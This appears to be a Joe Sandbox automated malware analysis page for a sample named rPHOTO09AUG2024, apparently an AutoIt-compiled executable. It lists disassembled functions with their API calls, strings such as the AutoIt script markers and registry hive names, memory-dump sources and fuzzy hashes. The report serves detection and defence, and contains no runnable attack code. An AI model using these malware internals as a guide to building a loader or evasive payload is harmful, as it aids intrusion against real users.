API String ID: 2733774712-3457252023
Opcode ID: 8520980e5d1c677d2e5cd2a685f8add6eb6eb3a55c960f485cc7d7a106055de1
Instruction ID: d7a622cb49f9d3c0192293b1d9d21ad8608599807074de7f5f074139ab33ebd0
Opcode Fuzzy Hash: 8520980e5d1c677d2e5cd2a685f8add6eb6eb3a55c960f485cc7d7a106055de1
Instruction Fuzzy Hash: FF318EB690021AABDB219FA4DC49FEB73BDEF89701F1441B6F908D2160E7709644CB39

Function 00DCBCED Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00DC9476,?,?), ref: 00DCBD10
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00DC9476,?,?,00000000,?), ref: 00DCBD27
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00DC9476,?,?,00000000,?), ref: 00DCBD32
CloseHandle.KERNEL32(00000000,?,?,?,?,00DC9476,?,?,00000000,?), ref: 00DCBD3F
GlobalLock.KERNEL32(00000000,?,?,?,?,00DC9476,?,?,00000000,?), ref: 00DCBD48
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DC9476,?,?,00000000,?), ref: 00DCBD57
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00DC9476,?,?,00000000,?), ref: 00DCBD60
CloseHandle.KERNEL32(00000000,?,?,?,?,00DC9476,?,?,00000000,?), ref: 00DCBD67
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00DC9476,?,?,00000000,?), ref: 00DCBD78
OleLoadPicture.OLEAUT32(?,00000000,00000000,00DD2CAC,?), ref: 00DCBD91
GlobalFree.KERNEL32(00000000), ref: 00DCBDA1
GetObjectW.GDI32(00000000,00000018,?), ref: 00DCBDC5
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00DCBDF0
DeleteObject.GDI32(00000000), ref: 00DCBE18
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DCBE2E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 42632bcb87890228c06bda3adaa928e43fff0270ad90eb6ec8ac48199e7202ee
Instruction ID: 6a261f960031c0c91612c3bd0f402b9ecc430ae1a89ca896ae6b16d98f5bbf92
Opcode Fuzzy Hash: 42632bcb87890228c06bda3adaa928e43fff0270ad90eb6ec8ac48199e7202ee
Instruction Fuzzy Hash: FE41067560030AAFDB219F65DC49EABBBB9EB89721F144069F906D7260D7309D01DB70

Function 00DADB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00DADC7B
_wcscat.LIBCMT ref: 00DADC93
_wcscat.LIBCMT ref: 00DADCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DADCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 00DADCCE
GetFileAttributesW.KERNEL32(?), ref: 00DADCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 00DADD00
SetCurrentDirectoryW.KERNEL32(?), ref: 00DADD12

Strings

*.*, xrefs: 00DADD51

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 575fd2f9fa64ae49fe1767e1fb64f7ad142137cd28929d635db8f58efa6b606b
Instruction ID: 18810730502054d89e42cea9d37a9616ae71dd2dd1489efc132e0e493c6421f4
Opcode Fuzzy Hash: 575fd2f9fa64ae49fe1767e1fb64f7ad142137cd28929d635db8f58efa6b606b
Instruction Fuzzy Hash: B48162715043419FCB24DF24C8459AAB7EAFF8A310F19882EF88AC7651E770D945CB72

Function 00DCC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DCC4EC
GetFocus.USER32 ref: 00DCC4FC
GetDlgCtrlID.USER32(00000000), ref: 00DCC507
_memset.LIBCMT ref: 00DCC632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00DCC65D
GetMenuItemCount.USER32(?), ref: 00DCC67D
GetMenuItemID.USER32(?,00000000), ref: 00DCC690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00DCC6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00DCC70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DCC744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00DCC779

Strings

0, xrefs: 00DCC62A

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: d852377e8227ba4047b1f6de42637aea3b08adb6faa531f254d659cab1eaf52c
Instruction ID: 13b17cd257f4b254bf728a1660e919fa6d50ac55e75a1c783b791f471b8dbaf6
Opcode Fuzzy Hash: d852377e8227ba4047b1f6de42637aea3b08adb6faa531f254d659cab1eaf52c
Instruction Fuzzy Hash: 09814A702183029FDB10CF24C984FAABBE9EB88314F14552DFA9997291D770D945CFB2

Function 00D983F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D98766
Part of subcall function 00D9874A: GetLastError.KERNEL32(?,00D9822A,?,?,?), ref: 00D98770
Part of subcall function 00D9874A: GetProcessHeap.KERNEL32(00000008,?,?,00D9822A,?,?,?), ref: 00D9877F
Part of subcall function 00D9874A: HeapAlloc.KERNEL32(00000000,?,00D9822A,?,?,?), ref: 00D98786
Part of subcall function 00D9874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D9879D

Part of subcall function 00D987E7: GetProcessHeap.KERNEL32(00000008,00D98240,00000000,00000000,?,00D98240,?), ref: 00D987F3
Part of subcall function 00D987E7: HeapAlloc.KERNEL32(00000000,?,00D98240,?), ref: 00D987FA
Part of subcall function 00D987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00D98240,?), ref: 00D9880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D98458
_memset.LIBCMT ref: 00D9846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D9848C
GetLengthSid.ADVAPI32(?), ref: 00D9849D
GetAce.ADVAPI32(?,00000000,?), ref: 00D984DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D984F6
GetLengthSid.ADVAPI32(?), ref: 00D98513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00D98522
HeapAlloc.KERNEL32(00000000), ref: 00D98529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D9854A
CopySid.ADVAPI32(00000000), ref: 00D98551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D98582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D985A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D985BC

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 9a23b8beccd48f2e7d4fb1de3f61a7f6a295a1db42138c419db8369533922f94
Instruction ID: 345ef0ca4809e610a1d4c2de7a7e87f60729616ebf8db3a097257a9c0cf5110e
Opcode Fuzzy Hash: 9a23b8beccd48f2e7d4fb1de3f61a7f6a295a1db42138c419db8369533922f94
Instruction Fuzzy Hash: A061067190020AABDF109FA4DC45EEEBBB9FF05B00F14816AE915E7291DB319A15EF70

Function 00DB762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00DB76A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00DB76AE
CreateCompatibleDC.GDI32(?), ref: 00DB76BA
SelectObject.GDI32(00000000,?), ref: 00DB76C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00DB771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00DB7757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00DB777B
SelectObject.GDI32(00000006,?), ref: 00DB7783
DeleteObject.GDI32(?), ref: 00DB778C
DeleteDC.GDI32(00000006), ref: 00DB7793
ReleaseDC.USER32(00000000,?), ref: 00DB779E

Strings

(, xrefs: 00DB7723

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 74ae4972ce1e5f972ebaac078e28fa0b7945bf251b0b38e06f82a459325a996a
Instruction ID: baeda2217b135434afe4ff42da6452f1e4faa5e667ad223d7d2bb01fb36a21df
Opcode Fuzzy Hash: 74ae4972ce1e5f972ebaac078e28fa0b7945bf251b0b38e06f82a459325a996a
Instruction Fuzzy Hash: FB51187590430AEFCB15CFA8CC85EEEBBB9EF48710F14852DF99A97350D631A9408B60

Function 00DAA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00DCFB78), ref: 00DAA0FC

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 00DAA11E
__swprintf.LIBCMT ref: 00DAA177
__swprintf.LIBCMT ref: 00DAA190
_wprintf.LIBCMT ref: 00DAA246
_wprintf.LIBCMT ref: 00DAA264

Strings

"%s" (%d) : ==> %s:, xrefs: 00DAA25F
Line %d (File "%s"):, xrefs: 00DAA171, 00DAA18A
Error: , xrefs: 00DAA20E
^ ERROR, xrefs: 00DAA1E8
"%s" (%d) : ==> %s:%s%s, xrefs: 00DAA241

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: f1c511fd8aa520a9ae3c867c32b8d3d57ae6ee868029a19138f3ab03759995d3
Instruction ID: cac33ee04cd4bf0964d3404c833a27d0a6fda4a74bd49b9cc0a8c0ea620267dc
Opcode Fuzzy Hash: f1c511fd8aa520a9ae3c867c32b8d3d57ae6ee868029a19138f3ab03759995d3
Instruction Fuzzy Hash: 0F517A7190021AABCF15EBA4CD86EEEB778EF05300F144265B515B21A2EB326F58CB71

Function 00D46BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00D60B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00D46C6C,?,00008000), ref: 00D60BB7

Part of subcall function 00D448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D448A1,?,?,00D437C0,?), ref: 00D448CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00D46D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00D46E5A

Part of subcall function 00D459CD: _wcscpy.LIBCMT ref: 00D45A05

Part of subcall function 00D6387D: _iswctype.LIBCMT ref: 00D63885

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 00D7E84A
Error opening the file, xrefs: 00D7E866, 00D7E8E1
Unterminated string, xrefs: 00D7EC0D
AU3!, xrefs: 00D46CC1
Bad directive syntax error, xrefs: 00D7EBC6
>>>AUTOIT SCRIPT<<<, xrefs: 00D7E8BF
EA06, xrefs: 00D7E87B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: ff4802d2ed98fc922a9f542f677bc552ff79d3a7407a8827a98b0c01338f5e74
Instruction ID: 6bde5cf4fd3b4c221a3935b23447e03b9f319b1b968928b03e7a594f7eb4a95b
Opcode Fuzzy Hash: ff4802d2ed98fc922a9f542f677bc552ff79d3a7407a8827a98b0c01338f5e74
Instruction Fuzzy Hash: 0A025C715083419FC714EF24C881AAFBBE5EF99314F04892DF48A972A2DB30D949CB72

Function 00D445DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D445F9
GetMenuItemCount.USER32(00E06890), ref: 00D7D7CD
GetMenuItemCount.USER32(00E06890), ref: 00D7D87D
GetCursorPos.USER32(?), ref: 00D7D8C1
SetForegroundWindow.USER32(00000000), ref: 00D7D8CA
TrackPopupMenuEx.USER32(00E06890,00000000,?,00000000,00000000,00000000), ref: 00D7D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D7D8E9

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 21e33b1358eb62bd779a25c4f855fa1875511d5d32b5e146e25969bc3a715867
Instruction ID: e64b6feb8d452d93c8f122957cda333c954a2ff32c37e9439ee181e0b03b096d
Opcode Fuzzy Hash: 21e33b1358eb62bd779a25c4f855fa1875511d5d32b5e146e25969bc3a715867
Instruction Fuzzy Hash: A471E270601206BFEB249F54DC85FAABF76FF05364F284216F519A61E0D7B1A850DBB0

Function 00DC10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DC0038,?,?), ref: 00DC10BC

Strings

HKCC, xrefs: 00DC118A
HKCU, xrefs: 00DC11AC
HKLM, xrefs: 00DC113A
HKEY_CLASSES_ROOT, xrefs: 00DC114F
HKEY_CURRENT_CONFIG, xrefs: 00DC1179
HKU, xrefs: 00DC11CE
HKEY_USERS, xrefs: 00DC11BD
HKEY_CURRENT_USER, xrefs: 00DC119B
HKCR, xrefs: 00DC1164
HKEY_LOCAL_MACHINE, xrefs: 00DC1125

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 933f4ce471fe174ce3c6e04987141f94d9d95d57386bed61bc8ebd4bc4b8071d
Instruction ID: 09489324bd3fad595dfc74fb1cd1164241518f09bab156d087e24260bb66ab21
Opcode Fuzzy Hash: 933f4ce471fe174ce3c6e04987141f94d9d95d57386bed61bc8ebd4bc4b8071d
Instruction Fuzzy Hash: 9241273815025F9BCF10EF90D892AEA3724EF12350F598559EE915B692DB30AD1ACB70

Function 00DA5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

Part of subcall function 00D47A84: _memmove.LIBCMT ref: 00D47B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DA55D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DA55E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DA55F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DA560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DA561C

Strings

play PlayMe wait, xrefs: 00DA5606
close PlayMe, xrefs: 00DA55E3, 00DA5610
status PlayMe mode, xrefs: 00DA55CD
alias PlayMe, xrefs: 00DA55AB
open , xrefs: 00DA5581
play PlayMe, xrefs: 00DA5617

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 676793bc3de502d039920ac8c909aee89dfa4397c8764c65cb57b1d27ff1b83d
Instruction ID: 68545ead641e66068d84249338e4adfb84844faa044a55bce2893fde3b273c03
Opcode Fuzzy Hash: 676793bc3de502d039920ac8c909aee89dfa4397c8764c65cb57b1d27ff1b83d
Instruction Fuzzy Hash: 0E11906095016E7ED720B7A5DC8ADFF7ABCEF92B00F450429B505A20D5DB601D09C5B1

Function 00DA48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00DA490E
gethostname.WSOCK32(?,00000100), ref: 00DA4928
gethostbyname.WSOCK32(?), ref: 00DA4935
_wcscpy.LIBCMT ref: 00DA495D
_memmove.LIBCMT ref: 00DA4970
inet_ntoa.WSOCK32(?), ref: 00DA497B
_strcat.LIBCMT ref: 00DA4989
_wcscpy.LIBCMT ref: 00DA49A0
WSACleanup.WSOCK32 ref: 00DA49AE
_wcscpy.LIBCMT ref: 00DA49BC

Strings

0.0.0.0, xrefs: 00DA4957

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 80626778b2a9656e96e9ffdad3cde28e8c6699b6c762ac7515d491ecf09e6301
Instruction ID: 852dec3afd4a062ea4c79e04c3524aeb611eaf20f7d9dbf9828ecc7b3273cd81
Opcode Fuzzy Hash: 80626778b2a9656e96e9ffdad3cde28e8c6699b6c762ac7515d491ecf09e6301
Instruction Fuzzy Hash: 55110A71904216AFCB20EB64DC46EEF77BCDF42720F04417AF445D6191EFB19A818A71

Function 00DA5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00DA521C

Part of subcall function 00D60719: timeGetTime.WINMM(?,7694B400,00D50FF9), ref: 00D6071D

Sleep.KERNEL32(0000000A), ref: 00DA5248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00DA526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00DA528E
SetActiveWindow.USER32 ref: 00DA52AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DA52BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 00DA52DA
Sleep.KERNEL32(000000FA), ref: 00DA52E5
IsWindow.USER32 ref: 00DA52F1
EndDialog.USER32(00000000), ref: 00DA5302

Strings

BUTTON, xrefs: 00DA5280

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: e2068b8075638db6168a060b33e0cce38d0641241efa40627bf88a3295337ef3
Instruction ID: 857bdd07ba13a2cad224689247b11f1cf71d17c21e1f16badaaa43efec5b92d0
Opcode Fuzzy Hash: e2068b8075638db6168a060b33e0cce38d0641241efa40627bf88a3295337ef3
Instruction Fuzzy Hash: 6121A171244746BFE7005B31FC88FA63B6BEB96346F141424F141E12B5CBA6AC989B31

Function 00DAD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

CoInitialize.OLE32(00000000), ref: 00DAD855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DAD8E8
SHGetDesktopFolder.SHELL32(?), ref: 00DAD8FC
CoCreateInstance.OLE32(00DD2D7C,00000000,00000001,00DFA89C,?), ref: 00DAD948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DAD9B7
CoTaskMemFree.OLE32(?,?), ref: 00DADA0F
_memset.LIBCMT ref: 00DADA4C
SHBrowseForFolderW.SHELL32(?), ref: 00DADA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DADAAB
CoTaskMemFree.OLE32(00000000), ref: 00DADAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00DADAE9
CoUninitialize.OLE32(00000001,00000000), ref: 00DADAEB

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
